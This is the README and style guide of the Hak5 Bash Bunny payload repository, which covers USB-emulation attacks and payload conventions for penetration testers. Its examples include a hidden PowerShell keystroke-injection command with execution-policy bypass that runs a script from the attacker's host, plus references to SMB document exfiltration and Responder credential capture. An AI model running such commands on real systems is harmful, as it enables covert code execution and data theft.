This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
Documentation on developing payloads for the Bash Bunny can be found on the docs.hak5.org website. Guides can be found on the Bash Bunny blog.
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with - or _ used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
Title: SMB Exfiltrator
Description: Exfiltrates files from %userprofile%\documents via SMB
Author: Hak5Darren
Target: Windows XP SP3 - Latest
Dependencies: impacket
Configurable options should be specified in variables at the top of the payload.txt file
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
# Initialization
LED SETUP
GET SWITCH_POSITION
GET HOST_IP
# Attack
LED ATTACK
ATTACKMODE HID ECM_ETHERNET
Stages should be documented with comments
# Keystroke Injection Stage
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED STAGE1
ATTACKMODE HID
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
Common payload states include a SETUP, with may include a FAIL if certain conditions are not met. This is typically followed by either a single ATTACK or multiple STAGEs. More complex payloads may include a SPECIAL function to wait until certain conditions are met. Payloads commonly end with a CLEANUP phase, such as moving and deleting files or stopping services. A payload may FINISH when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to LED states.